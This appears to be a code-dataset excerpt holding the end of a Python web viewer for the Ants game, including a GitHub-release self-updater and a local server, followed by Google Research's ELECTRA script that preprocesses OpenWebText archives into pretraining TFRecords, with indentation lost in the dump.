gui.deadbees.append(gui.beeToId[ant])
gui.saveState("deadbees", gui.deadbees)
def update():
request = urllib.request.Request("https://api.github.com/repos/colinschoen/Ants-Web-Viewer/releases/latest")
data = None
print("Checking for updates...")
try:
response = urllib.request.urlopen(request)
data = json.loads(response.read().decode('utf-8'))
except urllib.request.URLError as e:
print('Unable to check for updates')
if data:
release_version = float(data["name"])
if release_version > VERSION:
print("Local version of", VERSION, "is behind remote version of", release_version)
get_update(data["zipball_url"], data["name"])
else:
print("Local version of", VERSION, "is current with or ahead of remote version of", release_version)
def get_update(url, version):
request = urllib.request.Request(url)
print("Downloading new version...")
try:
response = urllib.request.urlopen(request)
with open(version + ".zip", 'wb') as f:
f.write(response.read())
f = zipfile.ZipFile(version + ".zip")
f.extractall(version)
# Delete original archive
os.remove(version + ".zip")
os.chdir(version)
os.chdir(os.listdir()[0])
files = os.listdir()
dirs = []
for f in files:
# Skip hidden files and .md files
if f[0] == "." or f[-3:] == ".md":
continue
if os.path.isdir(f):
dirs.append(f)
continue
# Copy the files up two directories
shutil.copy(f, "../../" + f)
for d in dirs:
distutils.dir_util.copy_tree(d, "../../" + d)
# Delete our temp directory
os.chdir('../..')
print("Cleaning up...")
shutil.rmtree(version)
print("Update complete")
except Exception as e:
print("Error:", e)
import socketserver, socket
class CustomThreadingTCPServer(socketserver.ThreadingTCPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
@main
def run(*args):
# Start webserver
import socketserver
import webbrowser
import sys
PORT = 8000
global gui
gui = GUI()
gui.args = args
# Basic HTTP Handler
#Handler = http.server.SimpleHTTPRequestHandler
for PORT in range(8000, 8100):
try:
httpd = CustomThreadingTCPServer(("", PORT), HttpHandler)
break
except:
pass
else:
print("Could not start webserver: all ports in range 8000-8099 are taken")
sys.exit(1)
print("Web Server started @ localhost:" + str(PORT))
def start_http():
while gui.active:
httpd.handle_request()
print("Web server terminated")
threading.Thread(target=start_http).start()
try:
webbrowser.open("http://localhost:" + str(PORT) + '/gui.html', 2)
except Exception:
print("Unable to automatically open web browser.")
print("Point your browser to http://localhost:" + str(PORT) + '/gui.html')
|
build_openwebtext_pretraining_dataset.py
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Preprocessess the Open WebText corpus for ELECTRA pre-training."""
import argparse
import multiprocessing
import os
import random
import tarfile
import time
import tensorflow.compat.v1 as tf
import build_pretraining_dataset
from util import utils
def write_examples(job_id, args):
"""A single process creating and writing out pre-processed examples."""
job_tmp_dir = os.path.join(args.data_dir, "tmp", "job_" + str(job_id))
owt_dir = os.path.join(args.data_dir, "openwebtext")
def log(*args):
msg = " ".join(map(str, args))
print("Job {}:".format(job_id), msg)
log("Creating example writer")
example_writer = build_pretraining_dataset.ExampleWriter(
job_id=job_id,
vocab_file=os.path.join(args.data_dir, "vocab.txt"),
output_dir=os.path.join(args.data_dir, "pretrain_tfrecords"),
max_seq_length=args.max_seq_length,
num_jobs=args.num_processes,
blanks_separate_docs=False,
do_lower_case=args.do_lower_case,
)
log("Writing tf examples")
fnames = sorted(tf.io.gfile.listdir(owt_dir))
fnames = [f for (i, f) in enumerate(fnames) if i % args.num_processes == job_id]
random.shuffle(fnames)
start_time = time.time()
for file_no, fname in enumerate(fnames):
if file_no > 0 and file_no % 10 == 0:
elapsed = time.time() - start_time
log(
"processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
"{:} examples written".format(
file_no,
len(fnames),
100.0 * file_no / len(fnames),
int(elapsed),
int((len(fnames) - file_no) / (file_no / elapsed)),
example_writer.n_written,
)
)
utils.rmkdir(job_tmp_dir)
with tarfile.open(os.path.join(owt_dir, fname)) as f:
f.extractall(job_tmp_dir)
extracted_files = tf.io.gfile.listdir(job_tmp_dir)
random.shuffle(extracted_files)
for txt_fname in extracted_files:
example_writer.write_examples(os.path.join(job_tmp_dir, txt_fname))
example_writer.finish()
log("Done!")
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--data-dir", required=True, help="Location of data (vocab file, corpus, etc).")
parser.add_argument("--max-seq-length", default=128, type=int, help="Number of tokens per example.")
parser.add_argument("--num-processes", default=1, type=int, help="Parallelize across multiple processes.")
parser.add_argument("--do-lower-case", dest="do_lower_case", action="store_true", help="Lower case input text.")
parser.add_argument(
"--no-lower-case", dest="do_lower_case", action="store_false", help="Don't lower case input text."
)
parser.set_defaults(do_lower_case=True)
args = parser.parse_args()
utils.rmkdir(os.path.join(args.data_dir, "pretrain_tfrecords"))
if args.num_processes == 1:
write_examples(0, args)
else:
jobs = []
for i in range(args.num_processes):
job = multiprocessing.Process(target=write_examples, args=(i, args))
jobs.append(job)
job.start()
for job in jobs:
job.join()
if __name__ == "__main__":
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.